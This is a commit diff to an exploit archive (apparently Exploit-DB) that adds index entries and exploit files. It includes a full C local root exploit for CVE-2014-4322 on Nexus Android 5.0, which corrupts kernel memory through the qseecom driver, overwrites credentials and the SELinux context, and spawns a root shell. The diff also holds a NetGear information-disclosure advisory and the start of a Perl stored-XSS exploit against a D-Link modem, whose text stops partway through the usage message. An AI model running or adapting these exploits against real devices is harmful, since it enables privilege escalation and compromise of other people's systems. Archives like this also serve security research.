Update: 2015-01-19
16 new exploits
This commit is contained in:
parent
7bb980404f
commit
77291f0ca3
17 changed files with 2130 additions and 0 deletions
16
files.csv
16
files.csv
|
@ -32170,6 +32170,7 @@ id,file,description,date,author,platform,type,port
|
|||
35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
|
||||
35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0
|
||||
35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80
|
||||
35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0
|
||||
35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0
|
||||
35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0
|
||||
35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0
|
||||
|
@ -32191,6 +32192,7 @@ id,file,description,date,author,platform,type,port
|
|||
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
|
||||
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
|
||||
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
|
||||
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Dave,php,webapps,80
|
||||
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
|
||||
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
|
||||
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -32198,13 +32200,17 @@ id,file,description,date,author,platform,type,port
|
|||
35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0
|
||||
35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
|
||||
35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0
|
||||
35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0
|
||||
35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
|
||||
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0
|
||||
35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0
|
||||
35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0
|
||||
35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"Mauricio Correa",hardware,webapps,0
|
||||
35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0
|
||||
35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0
|
||||
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"Mauricio Correa",hardware,webapps,0
|
||||
35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"Mauricio Correa",hardware,webapps,0
|
||||
35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0
|
||||
35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0
|
||||
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
|
||||
|
@ -32244,6 +32250,8 @@ id,file,description,date,author,platform,type,port
|
|||
35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0
|
||||
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0
|
||||
35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0
|
||||
35793,platforms/win32/shellcode/35793.txt,"Obfuscated Shellcode Windows x86 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win32,shellcode,0
|
||||
35794,platforms/win64/shellcode/35794.txt,"Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win64,shellcode,0
|
||||
35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0
|
||||
35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection Vulnerability",2011-05-25,"ThunDEr HeaD",php,webapps,0
|
||||
35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 '_kurl' Parameter Cross Site Scripting Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0
|
||||
|
@ -32252,9 +32260,17 @@ id,file,description,date,author,platform,type,port
|
|||
35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0
|
||||
35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0
|
||||
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0
|
||||
35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 'libnvbasics.dll' Remote Denial of Service Vulnerability",2011-05-28,"Luigi Auriemma",windows,dos,0
|
||||
35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution Vulnerability",2011-05-28,"Kacper Szczesniak",multiple,remote,0
|
||||
35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow Vulnerability",2011-05-27,"Kevin R.V",windows,remote,0
|
||||
35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting Vulnerability",2011-05-31,LiquidWorm,asp,webapps,0
|
||||
35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 'index.php' Cross Site Scripting Vulnerability",2011-05-31,"Stefan Schurtz",php,webapps,0
|
||||
35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
|
||||
35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
|
||||
35814,platforms/php/webapps/35814.txt,"TEDE Simplificado v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
|
||||
35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
|
||||
35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
|
||||
35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
|
||||
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
|
||||
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
|
||||
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
552
platforms/android/local/35711.c
Executable file
552
platforms/android/local/35711.c
Executable file
|
@ -0,0 +1,552 @@
|
|||
/*
|
||||
* CVE-2014-4322 exploit for Nexus Android 5.0
|
||||
*
|
||||
* author: retme retme7@gmail.com
|
||||
* website: retme.net
|
||||
*
|
||||
* The exploit must be excuted as system privilege and specific SELinux context.
|
||||
* If exploit successed,you will gain root privilege and "kernel" SELinux context
|
||||
*
|
||||
* bug info:
|
||||
* https://www.codeaurora.org/projects/security-advisories/memory-corruption-qseecom-driver-cve-2014-4322
|
||||
*
|
||||
* how to build:
|
||||
*
|
||||
create an Android.mk as follow:
|
||||
|
||||
include $(CLEAR_VARS)
|
||||
include $(CLEAR_VARS)
|
||||
LOCAL_SRC_FILES:= ./msm.c \
|
||||
./shellcode.S
|
||||
|
||||
LOCAL_MODULE:= exploit
|
||||
#LOCAL_C_INCLUDES += $(common_includes)
|
||||
LOCAL_CPPFLAGS += -DDEBUG
|
||||
LOCAL_CFLAGS += -DDEBUG
|
||||
LOCAL_LDLIBS += -L$(SYSROOT)/usr/lib -llog
|
||||
|
||||
include $(BUILD_EXECUTABLE)
|
||||
include $(BUILD_EXECUTABLE)
|
||||
|
||||
create Application.mk as follow:
|
||||
|
||||
APP_ABI := armeabi
|
||||
APP_PLATFORM := android-8
|
||||
APP_PIE:= true
|
||||
|
||||
use ndk-build to build the project
|
||||
|
||||
usage:
|
||||
|
||||
run exploit as system privilege,with SELinux context such as "keystore","vold","drmserver","mediaserver","surfaceflinger"
|
||||
*
|
||||
* If exploit successed,you will gain root privilege and "kernel" SELinux context
|
||||
*
|
||||
*
|
||||
* */
|
||||
//=========================================msm.c=============================================
|
||||
#include <string.h>
|
||||
#include <jni.h>
|
||||
#include <android/log.h>
|
||||
#include <pthread.h>
|
||||
#include <sys/prctl.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <asm/ptrace.h>
|
||||
#include <asm/user.h>
|
||||
#include <asm/ptrace.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/types.h>
|
||||
#include <dlfcn.h>
|
||||
#include <dirent.h>
|
||||
#include <unistd.h>
|
||||
#include <linux/elf.h>
|
||||
#include <linux/reboot.h>
|
||||
#include <errno.h>
|
||||
#include <dlfcn.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <errno.h>
|
||||
#include <dirent.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/mount.h>
|
||||
#include <linux/ptrace.h>
|
||||
#include <linux/prctl.h>
|
||||
#include <sys/system_properties.h>
|
||||
#include <errno.h>
|
||||
#include <termios.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <netinet/in.h>
|
||||
#include <errno.h>
|
||||
#include <linux/ion.h>
|
||||
|
||||
#include "../kernel.h"
|
||||
#include "qseecom.h"
|
||||
|
||||
//4.4.2 CFW(for debug)
|
||||
//#define PTMX_FOPS 0xc1334e00
|
||||
//fnPrintk printk = 0xc0a0113c;
|
||||
|
||||
//Nexus Android 5.0 OFW
|
||||
#define PTMX_DEVICE "/dev/ptmx"
|
||||
#define PTMX_FOPS 0xc1236cd8
|
||||
fnPrintk printk = 0xc0a21e78;
|
||||
|
||||
int MyCommitCred(int ruid, int rgid, signed int a3, int isSelinux);
|
||||
|
||||
int kmemcmp(char *a1, char *a2, int len)
|
||||
{
|
||||
int v3; // r3@2
|
||||
int v4; // r4@3
|
||||
int v5; // r5@3
|
||||
int result; // r0@4
|
||||
|
||||
if ( len )
|
||||
{
|
||||
v3 = 0;
|
||||
while ( 1 )
|
||||
{
|
||||
v4 = a1[v3];
|
||||
v5 = a2[v3];
|
||||
if ( v4 != v5 )
|
||||
break;
|
||||
if ( a1[v3] )
|
||||
{
|
||||
++v3;
|
||||
if ( len != v3 )
|
||||
continue;
|
||||
}
|
||||
goto LABEL_7;
|
||||
}
|
||||
result = v4 - v5;
|
||||
}
|
||||
else
|
||||
{
|
||||
LABEL_7:
|
||||
result = 0;
|
||||
}
|
||||
return result;
|
||||
}
|
||||
|
||||
int g_pid = 0;
|
||||
int g_tgid = 0;
|
||||
|
||||
|
||||
|
||||
int open_ion(){
|
||||
int fd = open("/dev/ion",O_RDONLY);
|
||||
if (fd<0){
|
||||
perror("open");
|
||||
}
|
||||
printf("ion fd %d\n",fd);
|
||||
return fd;
|
||||
}
|
||||
|
||||
|
||||
// http://lwn.net/Articles/480055/
|
||||
|
||||
/*
|
||||
* struct ion_allocation_data {
|
||||
size_t len;
|
||||
size_t align;
|
||||
unsigned int heap_mask;
|
||||
unsigned int flags;
|
||||
struct ion_handle *handle;
|
||||
};
|
||||
*
|
||||
*
|
||||
* */
|
||||
#define ION_FLAG_SECURE (1<<31)
|
||||
|
||||
int alloc_ion_memory(int client_fd,int size,struct ion_handle** pphandle){
|
||||
int ret = -1;
|
||||
|
||||
struct ion_allocation_data data;
|
||||
|
||||
// ION_FLAG_CACHED
|
||||
data.len = size;
|
||||
data.align = size;
|
||||
data.flags = ION_HEAP_TYPE_CARVEOUT ;
|
||||
//data.heap_mask = ION_HEAP_TYPE_CARVEOUT;
|
||||
//data.handle = handle;
|
||||
|
||||
ret = ioctl(client_fd, ION_IOC_ALLOC, &data);
|
||||
if (ret<0){
|
||||
perror("ION_IOC_ALLOC");
|
||||
}
|
||||
*pphandle = data.handle;
|
||||
return ret;
|
||||
|
||||
}
|
||||
/*
|
||||
struct ion_fd_data {
|
||||
struct ion_handle *handle;
|
||||
int fd;
|
||||
}
|
||||
*/
|
||||
int share_ion_memory(int client_fd,struct ion_handle* handle){
|
||||
struct ion_fd_data data;
|
||||
data.handle = handle;
|
||||
data.fd = -1;
|
||||
|
||||
int ret = ioctl(client_fd, ION_IOC_SHARE, &data);
|
||||
|
||||
|
||||
return data.fd;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
int obtain_dma_buf_fd(int size){
|
||||
int fd_device = open_ion();
|
||||
int dmf_fd = -1;
|
||||
|
||||
struct ion_handle* handle;
|
||||
int ret = alloc_ion_memory(fd_device,size,&handle);
|
||||
if (ret<0){
|
||||
perror("alloc_ion_memory");
|
||||
}
|
||||
|
||||
dmf_fd = share_ion_memory(fd_device,handle);
|
||||
|
||||
if (dmf_fd<0){
|
||||
perror("share_ion_memory");
|
||||
}
|
||||
return dmf_fd;
|
||||
}
|
||||
|
||||
|
||||
void* fd_to_mmap(int fd,int size){
|
||||
|
||||
|
||||
void* seg_addr = mmap(0,
|
||||
size ,
|
||||
PROT_READ | PROT_WRITE,
|
||||
MAP_SHARED,
|
||||
fd,
|
||||
0);
|
||||
|
||||
if(seg_addr == MAP_FAILED){
|
||||
perror("fd_to_map");
|
||||
}
|
||||
|
||||
return seg_addr;
|
||||
}
|
||||
|
||||
|
||||
|
||||
//c0a0113c T printk
|
||||
void sayhello(){
|
||||
fnPrintk printk = 0xc0a0113c;
|
||||
printk("hell0 shellocde");
|
||||
return;
|
||||
}
|
||||
|
||||
void shell_code2();
|
||||
|
||||
static int
|
||||
run_obtain_root_privilege()
|
||||
{
|
||||
int fd;
|
||||
int ret;
|
||||
|
||||
fd = open(PTMX_DEVICE, O_WRONLY);
|
||||
if(fd<=0){perror("ptmx");return -1;}
|
||||
ret = fsync(fd);
|
||||
close(fd);
|
||||
|
||||
return ret;
|
||||
}
|
||||
|
||||
|
||||
int main(int argc, char *argv[]){
|
||||
|
||||
printf("mypid %d\n",getpid());
|
||||
int ret = -1;
|
||||
|
||||
int fd = open("/dev/qseecom", 0);
|
||||
if (fd<0){
|
||||
perror("open");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
void* abuseBuff = malloc(400);
|
||||
memset(abuseBuff,0,400);
|
||||
|
||||
int* intArr = (int*)abuseBuff;
|
||||
int j = 0;
|
||||
|
||||
for(j=0;j<24;j++){
|
||||
|
||||
intArr[j] = 0x1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
struct qseecom_send_modfd_cmd_req ioctlBuff;
|
||||
|
||||
prctl(PR_SET_NAME, "GodFather", 0, 0, 0);
|
||||
|
||||
// if(0==fork()){
|
||||
|
||||
g_pid = getpid();
|
||||
g_tgid = g_pid;
|
||||
prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);
|
||||
|
||||
//QSEECOM_IOCTL_SET_MEM_PARAM_REQ
|
||||
struct qseecom_set_sb_mem_param_req req;
|
||||
req.ifd_data_fd = obtain_dma_buf_fd(8192);
|
||||
|
||||
req.virt_sb_base = abuseBuff;
|
||||
req.sb_len = 8192;
|
||||
|
||||
ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
|
||||
printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);
|
||||
|
||||
ioctlBuff.cmd_req_buf = abuseBuff;
|
||||
ioctlBuff.cmd_req_len = 400;
|
||||
ioctlBuff.resp_buf = abuseBuff;
|
||||
ioctlBuff.resp_len = 400;
|
||||
int i = 0;
|
||||
for (i = 0;i<4;i++){
|
||||
ioctlBuff.ifd_data[i].fd = 0;
|
||||
ioctlBuff.ifd_data[i].cmd_buf_offset =0;
|
||||
}
|
||||
ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
|
||||
ioctlBuff.ifd_data[0].cmd_buf_offset = 0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff;
|
||||
|
||||
|
||||
printf("QSEECOM_IOCTL_SEND_CMD_REQ");
|
||||
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
|
||||
|
||||
|
||||
printf("return %p %p\n",intArr[0],intArr[1]);
|
||||
perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
|
||||
printf("ioctl return 0x%x \n",ret);
|
||||
|
||||
//*(int*)intArr[0] = 0x0;
|
||||
void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
|
||||
printf("mmap return %p \n",addr);
|
||||
|
||||
*(int*)addr = 0xE3500000;
|
||||
*((int*)((int)addr+4)) = 0xe1a0f00e;
|
||||
memcpy(addr,shell_code2,400);
|
||||
|
||||
int* arr = (int*)addr;
|
||||
for(i=0;i<10;i++){
|
||||
if(arr[i] == 0xeeeeeeee)
|
||||
arr[i] = (int)MyCommitCred;
|
||||
printf("%p\n",arr[i]);
|
||||
|
||||
}
|
||||
|
||||
//c1334e00 b ptmx_fops
|
||||
ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;
|
||||
|
||||
|
||||
printf("QSEECOM_IOCTL_SEND_CMD_REQ");
|
||||
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
|
||||
printf("return %p %p\n",intArr[0],intArr[1]);
|
||||
perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
|
||||
printf("ioctl return 0x%x \n",ret);
|
||||
|
||||
|
||||
run_obtain_root_privilege();
|
||||
|
||||
|
||||
char * argv1[]={"sh",(char *)0};
|
||||
int result = execv("/system/bin/sh", argv1);
|
||||
if(result){
|
||||
perror("execv");
|
||||
}
|
||||
|
||||
return 0;
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
int MyCommitCred(int ruid, int rgid, signed int a3, int isSelinux)
|
||||
{
|
||||
|
||||
int v38; // [sp+0h] [bp-60h]@1
|
||||
int addrBase;
|
||||
char szName[16] = "ihoo.darkytools";
|
||||
int offset;
|
||||
mycred *my_cred;
|
||||
mycred *my_real_cred;
|
||||
struct task_security_struct * tsec;
|
||||
int ret = -1;
|
||||
|
||||
int searchLenth;
|
||||
|
||||
isSelinux = 1;
|
||||
//return 0;
|
||||
addrBase = *(int*)(((int)(&v38) & 0xFFFFE000) + 0xC);
|
||||
//return addrBase;
|
||||
if ( addrBase > 0xBFFFFFFF )
|
||||
{
|
||||
|
||||
offset = 0;
|
||||
while ( 1 )
|
||||
{
|
||||
addrBase += 4;
|
||||
if ( !kmemcmp(addrBase, szName, 16) )
|
||||
break;
|
||||
++offset;
|
||||
if ( offset == 0x600 )
|
||||
{
|
||||
return 18;
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
return 17;
|
||||
|
||||
my_cred = *(int*)(addrBase -8);
|
||||
my_real_cred = *(int*)(addrBase -8 - 4);
|
||||
|
||||
|
||||
searchLenth = 0;
|
||||
while(searchLenth<0x20){
|
||||
|
||||
|
||||
if(!my_cred || !my_real_cred
|
||||
|| my_cred<0xBFFFFFFF || my_real_cred<0xBFFFFFFF
|
||||
){
|
||||
//2.6?
|
||||
|
||||
addrBase-=4;
|
||||
|
||||
|
||||
my_cred = *(int*)(addrBase-8 );
|
||||
my_real_cred = *(int*)(addrBase -8-4);
|
||||
|
||||
}
|
||||
else
|
||||
break;
|
||||
|
||||
searchLenth++;
|
||||
}
|
||||
|
||||
if(searchLenth == 0x20)
|
||||
return 0X20;
|
||||
// fuck!! where is my cred???
|
||||
|
||||
|
||||
my_cred->uid = 0;
|
||||
my_cred->gid = 0;
|
||||
my_cred->suid = 0;
|
||||
my_cred->sgid = 0;
|
||||
my_cred->egid = 0;
|
||||
my_cred->euid = 0;
|
||||
my_cred->fsgid = 0;
|
||||
my_cred->fsuid = 0;
|
||||
my_cred->securebits=0;
|
||||
my_cred->cap_bset.cap[0] = -1;
|
||||
my_cred->cap_bset.cap[1] = -1;
|
||||
my_cred->cap_inheritable.cap[0] = -1;
|
||||
my_cred->cap_inheritable.cap[1] = -1;
|
||||
my_cred->cap_permitted.cap[0] = -1;
|
||||
my_cred->cap_permitted.cap[1] = -1;
|
||||
my_cred->cap_effective.cap[0] = -1;
|
||||
my_cred->cap_effective.cap[1] = -1;
|
||||
|
||||
my_real_cred->uid = 0;
|
||||
my_real_cred->gid = 0;
|
||||
my_real_cred->suid = 0;
|
||||
my_real_cred->sgid = 0;
|
||||
my_real_cred->egid = 0;
|
||||
my_real_cred->euid = 0;
|
||||
my_real_cred->fsgid = 0;
|
||||
my_real_cred->fsuid = 0;
|
||||
my_real_cred->securebits=0;
|
||||
my_real_cred->cap_bset.cap[0] = -1;
|
||||
my_real_cred->cap_bset.cap[1] = -1;
|
||||
my_real_cred->cap_inheritable.cap[0] = -1;
|
||||
my_real_cred->cap_inheritable.cap[1] = -1;
|
||||
my_real_cred->cap_permitted.cap[0] = -1;
|
||||
my_real_cred->cap_permitted.cap[1] = -1;
|
||||
my_real_cred->cap_effective.cap[0] = -1;
|
||||
my_real_cred->cap_effective.cap[1] = -1;
|
||||
|
||||
|
||||
if(isSelinux){
|
||||
|
||||
tsec = my_cred->security;
|
||||
|
||||
if(tsec && tsec > 0xBFFFFFFF){
|
||||
tsec->sid = 1;
|
||||
tsec->exec_sid = 1;
|
||||
|
||||
ret = 15;
|
||||
}
|
||||
else {
|
||||
tsec = (struct task_security_struct*)(*(int*)(0x10 + (int)&my_cred->security));
|
||||
|
||||
if(tsec && tsec > 0xBFFFFFFF){
|
||||
tsec->sid = 1;
|
||||
tsec->exec_sid = 1;
|
||||
|
||||
ret = 15;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
tsec = my_real_cred->security;
|
||||
|
||||
if(tsec && tsec > 0xBFFFFFFF){
|
||||
tsec->sid = 1;
|
||||
tsec->exec_sid = 1;
|
||||
|
||||
ret = 15;
|
||||
}else {
|
||||
tsec = (struct task_security_struct*)(*(int*)(0x10 + (int)&my_real_cred->security));
|
||||
|
||||
if(tsec && tsec > 0xBFFFFFFF){
|
||||
tsec->sid = 1;
|
||||
tsec->exec_sid = 1;
|
||||
|
||||
ret = 15;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
}
|
||||
else{
|
||||
ret = 16;
|
||||
}
|
||||
printk("return %d",ret);
|
||||
return ret;
|
||||
}
|
||||
//=========================================msm.c end=============================================
|
||||
//=========================================shellcode.S start=============================================
|
||||
#define __ASSEMBLY__
|
||||
#include <linux/linkage.h>
|
||||
|
||||
.extern sayhello
|
||||
|
||||
|
||||
ENTRY(shell_code2)
|
||||
ldr r0, [pc , #4]
|
||||
STMFD SP!, {R0}
|
||||
LDMFD SP!, {PC}
|
||||
.byte 0xee, 0xee, 0xee, 0xee
|
||||
//=========================================shellcode.S end=============================================
|
10
platforms/hardware/remote/35817.txt
Executable file
10
platforms/hardware/remote/35817.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/48085/info
|
||||
|
||||
NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.
|
||||
|
||||
A remote attacker can exploit these issues to obtain sensitive information that can aid in launching further attacks.
|
||||
|
||||
WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected.
|
||||
|
||||
http://www.example.com/downloadFile.php
|
||||
http://www.example.com/BackupConfig.php
|
137
platforms/hardware/webapps/35747.pl
Executable file
137
platforms/hardware/webapps/35747.pl
Executable file
|
@ -0,0 +1,137 @@
|
|||
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
|
||||
# Date: 11-01-2015
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.dlink.com
|
||||
# Hardware version: C1
|
||||
# Version: GE 1.01
|
||||
# Tested on: Windows 8 and Linux
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Date dd-mm-aaaa: 11-11-2014
|
||||
# Exploit for D-Link DSL-2730B
|
||||
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
|
||||
# Developed by Mauricio Corrêa
|
||||
# XLabs Information Security
|
||||
# WebSite: www.xlabs.com.br
|
||||
# More informations: www.xlabs.com.br/blog/?p=339
|
||||
#
|
||||
# CAUTION!
|
||||
# This exploit disables some features of the modem,
|
||||
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
|
||||
# occurring script execution in the browser of internal network users.
|
||||
#
|
||||
# Use with caution!
|
||||
# Use at your own risk!
|
||||
#
|
||||
|
||||
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
use diagnostics;
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request;
|
||||
use URI::Escape;
|
||||
|
||||
|
||||
my $ip = $ARGV[0];
|
||||
my $user = $ARGV[1];
|
||||
my $pass = $ARGV[2];
|
||||
my $opt = $ARGV[3];
|
||||
$ip = $1 if($ip=~/(.*)\/$/);
|
||||
|
||||
if (@ARGV != 4){
|
||||
|
||||
print "\n";
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
|
||||
print "\n";
|
||||
